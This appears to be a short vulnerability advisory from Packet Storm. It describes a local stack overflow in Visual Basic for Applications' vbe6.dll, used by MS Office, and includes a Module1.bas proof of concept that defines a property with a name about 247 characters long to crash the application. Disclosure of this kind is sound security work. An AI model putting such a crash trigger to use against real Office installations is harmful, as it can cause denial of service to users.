Visual Basic suffers from a local stack overflow vulnerability in vbe6.dll that can lead to a denial of service condition.
8fb3771ca08590a5f9a0570aa7087507e34bc3f0ed87eb527f2c1b21a8c11633Stack overflow in vbe6.dll, (used by all versions of MS Office)
The overflow occurs in Visual Basic for Application.
Creating a property with a long name ( about 247 chars) results in a stack overflow in vbe6.dll which overwrites with a null byte the first byte of the return address.
Probably impossible to exploit, but who knows? ^^ At least, there still exist stack overflows in Office apps :P
Marsu <Marsupilamipowa@hotmail.fr>
Module1.bas:
Attribute VB_Name = "Module1"
Public Property Get aaabcdefghissssssaaaaaaaaaaaaaaaaaaaaaaaaaadaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabdaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaadaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaadaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaasssssssssssssssssssssssssssssssssssssssssssssssssssade() As Variant
End Property
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed